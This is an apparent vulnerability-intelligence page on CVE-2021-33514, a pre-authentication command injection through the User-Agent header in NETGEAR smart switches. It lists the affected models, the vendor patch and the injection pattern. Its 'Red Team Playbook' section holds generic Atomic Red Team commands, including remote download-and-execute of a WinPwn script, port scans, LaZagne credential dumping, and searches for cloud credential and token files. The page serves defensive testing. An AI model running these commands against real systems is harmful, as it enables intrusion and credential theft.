CVE-2021-33514
Overview
This vulnerability is a command injection flaw arising from improper input validation in the /sqfs/lib/libsal.so.0.0 library utilized by a CGI application on certain NETGEAR smart switches. The root cause is the unsafe handling of user-supplied input within the User-Agent HTTP header, which is executed by the setup.cgi script without sanitization. Multiple firmware versions across various NETGEAR switch models incorporate this vulnerable component, enabling injection of arbitrary OS commands.
Vulnerability Description
Certain NETGEAR devices are affected by command injection by an unauthenticated attacker via the vulnerable /sqfs/lib/libsal.so.0.0 library used by a CGI application, as demonstrated by setup.cgi?token=';$HTTP_USER_AGENT;' with an OS command in the User-Agent field. This affects GC108P before 1.0.7.3, GC108PP before 1.0.7.3, GS108Tv3 before 7.0.6.3, GS110TPPv1 before 7.0.6.3, GS110TPv3 before 7.0.6.3, GS110TUPv1 before 1.0.4.3, GS710TUPv1 before 1.0.4.3, GS716TP before 1.0.2.3, GS716TPP before 1.0.2.3, GS724TPPv1 before 2.0.4.3, GS724TPv2 before 2.0.4.3, GS728TPPv2 before 6.0.6.3, GS728TPv2 before 6.0.6.3, GS752TPPv1 before 6.0.6.3, GS752TPv2 before 6.0.6.3, MS510TXM before 1.0.2.3, and MS510TXUP before 1.0.2.3.
Impact
An unauthenticated attacker with network access can execute arbitrary operating system commands on affected NETGEAR smart switches by exploiting this command injection vulnerability. This can lead to complete device compromise, unauthorized configuration changes, or disruption of network services. The attack requires no user interaction and leverages the HTTP User-Agent header, as indicated by the CVSS vector (AV:A/AC:L/PR:N/UI:N), highlighting low attack complexity and no privileges required.
Solution
NETGEAR has released security updates addressing this vulnerability in firmware versions 1.0.7.3 or later for GC108P and GC108PP, 7.0.6.3 or later for GS108Tv3 and GS110TP series, and corresponding updated versions for other affected models as detailed in advisory PSV-2021-0071 (https://kb.netgear.com/000063641). Users should apply the latest firmware updates for their specific device models as listed in the advisory. No alternative workarounds are provided; refer to the vendor advisory for detailed patching instructions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability affecting certain NETGEAR devices is characterized by a command injection flaw that allows unauthenticated attackers to execute arbitrary commands on the underlying operating system. This issue arises from improper handling of user input within the CGI application, specifically through the vulnerable library utilized by the devices. By manipulating the User-Agent field in HTTP requests, an attacker can inject malicious commands, leading to unauthorized access and control over the device. The affected models include various switches and access points, which are commonly deployed in both enterprise and home environments, making this vulnerability particularly concerning.
Exploitation of this vulnerability can occur through straightforward HTTP requests, where an attacker crafts a request to the setup.cgi endpoint with a specially crafted User-Agent string. This attack vector does not require any form of authentication, significantly lowering the barrier for exploitation. Once successful, an attacker could gain control over the device, potentially allowing them to alter configurations, intercept network traffic, or pivot to other devices within the same network. The simplicity of the attack method, combined with the high potential impact, makes this vulnerability a prime target for malicious actors.
The real-world implications of this vulnerability are substantial, particularly for organizations that rely on NETGEAR devices for their networking infrastructure. Successful exploitation could lead to data breaches, loss of sensitive information, and disruption of network services. Additionally, the potential for lateral movement within a network poses a significant business risk, as attackers may leverage compromised devices to access more critical systems. The financial repercussions could be severe, encompassing both direct costs associated with remediation and indirect costs related to reputational damage and loss of customer trust.
To address this vulnerability, organizations should prioritize detection and mitigation strategies. Regularly updating firmware to the latest versions released by NETGEAR is crucial, as these updates often include patches for known vulnerabilities. Network monitoring tools should be employed to detect unusual traffic patterns or unauthorized access attempts, particularly targeting the affected devices. Implementing strict access controls and network segmentation can also help minimize the risk of exploitation by limiting the exposure of vulnerable devices to untrusted networks. Additionally, organizations should conduct regular security assessments to identify and remediate potential vulnerabilities before they can be exploited.
In conclusion, the command injection vulnerability in certain NETGEAR devices presents a significant threat to both individual users and organizations. The ease of exploitation, combined with the potential for severe consequences, necessitates immediate attention from cybersecurity professionals. By adopting proactive measures, including timely firmware updates and robust network security practices, organizations can mitigate the risks associated with this vulnerability and protect their critical assets from unauthorized access and control.
Affected Products (17)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Netgear | Gc108p Firmware | All |
cpe:2.3:o:netgear:gc108p_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gc108pp Firmware | All |
cpe:2.3:o:netgear:gc108pp_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gs108t Firmware | All |
cpe:2.3:o:netgear:gs108t_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gs110tpp Firmware | All |
cpe:2.3:o:netgear:gs110tpp_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gs110tp Firmware | All |
cpe:2.3:o:netgear:gs110tp_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gs110tup Firmware | All |
cpe:2.3:o:netgear:gs110tup_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gs710tup Firmware | All |
cpe:2.3:o:netgear:gs710tup_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gs716tp Firmware | All |
cpe:2.3:o:netgear:gs716tp_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gs716tpp Firmware | All |
cpe:2.3:o:netgear:gs716tpp_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gs724tpp Firmware | All |
cpe:2.3:o:netgear:gs724tpp_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gs724tp Firmware | All |
cpe:2.3:o:netgear:gs724tp_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gs728tpp Firmware | All |
cpe:2.3:o:netgear:gs728tpp_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gs728tp Firmware | All |
cpe:2.3:o:netgear:gs728tp_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gs752tpp Firmware | All |
cpe:2.3:o:netgear:gs752tpp_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Gs752tp Firmware | All |
cpe:2.3:o:netgear:gs752tp_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Ms510txm Firmware | All |
cpe:2.3:o:netgear:ms510txm_firmware:*:*:*:*:*:*:*:*
|
|
|
Netgear | Ms510txup Firmware | All |
cpe:2.3:o:netgear:ms510txup_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
40%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-33514 |
| kb.netgear.com |
GitHub CVE
x_refsource_MISC
|
https://kb.netgear.com/000063641/Security-Advisory-for-Pre-Authentication-Command-Injection-Vulnerability-on-Some-Smart-Switches-PSV-2021-0071 |
| gynvael.coldwind.pl |
GitHub CVE
x_refsource_MISC
|
https://gynvael.coldwind.pl/?lang=en&id=733 |